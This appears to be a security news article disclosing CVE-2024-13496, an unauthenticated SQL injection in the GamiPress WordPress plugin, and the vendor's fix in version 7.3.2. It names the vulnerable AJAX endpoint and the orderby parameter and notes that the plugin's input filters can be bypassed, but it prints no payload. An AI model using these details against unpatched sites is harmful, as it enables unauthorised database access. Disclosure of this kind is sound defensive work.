A critical vulnerability in the popular WordPress plugin GamiPress, identified as CVE-2024-13496, allows unauthenticated SQL injection attacks and carries a high CVSS 3.1 score of 7.5, highlighting its serious risk.
Discovered during a security assessment of version 7.2.1, the flaw affects all versions up to 7.3.1, making it essential for users to update to the latest secure release.
WordPress plugin vulnerability
According to Abrahack, the vulnerability was found in the wp_ajax_nopriv_{$action} hook, allowing unauthenticated access.
The gamipress_get_logs AJAX endpoint was specifically vulnerable, as it retrieves user logs and accepts parameters that can affect database queries.
The gamipress_ajax_get_logs function uses the $_REQUEST array, which is passed into the gamipress_logs_shortcode function, which then queries the database through the gamipress_logs_shortcode_query function and the CT_Query class.
The vulnerability targets the orderby HTTP Request parameter, which is passed unsafely into an SQL query.
Despite restrictions like stripping white spaces and disallowing quotes, attackers can still exploit this with carefully crafted payloads.
A boolean time-based SQLi payload was used to demonstrate the exploit, allowing attackers to infer database information without directly extracting data.
The vendor fixed this issue in version 7.3.2 by implementing a whitelist for the orderby parameter, allowing only predefined columns in the gamipress_logs table, preventing SQL injection.
This highlights the need to properly handle user inputs in WordPress plugins. Users should update to version 7.3.2 or later to avoid potential SQL injection attacks.
Leave A Comment